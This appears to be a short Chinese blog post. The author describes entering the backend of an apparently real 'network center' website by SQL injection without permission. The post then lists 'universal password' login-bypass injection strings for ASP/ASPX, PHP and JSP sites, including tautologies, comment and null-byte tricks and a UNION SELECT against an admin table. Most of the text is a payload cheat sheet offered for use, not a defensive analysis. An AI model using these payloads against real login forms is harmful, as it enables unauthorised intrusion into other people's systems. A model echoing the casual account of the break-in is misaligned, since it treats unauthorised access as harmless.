******网络中心SQL注入漏洞******
起始: 4月11日 实验课
动机:下载高清影院客户端shipin.rar
过程:登录直接跳转某页面的后台,疑似出问题...
进入:SQL注入,你懂的,进去时候已经出问题了(不然我也进不去),没什么特别的东西!
******仅仅进去看了看,结束*******
万能密码汇总
截至到现在,网站已经打不开,附上一下SQL注入总结的万能密码,至于为什么会存在万能密码,大家还是去百度吧,不多说!学过SQL的基本上都能了解到!过滤不严,逻辑真!
[cpp]
asp aspx万能密码
"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
"or 1=1%00
'xor
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
..admin' or 'a'='a 密码随便
PHP万能密码
'or 1=1/*
User: something
Pass: ' OR '1'='1
jsp 万能密码
1'or'1'='1
admin' OR 1=1/*
[/cpp]
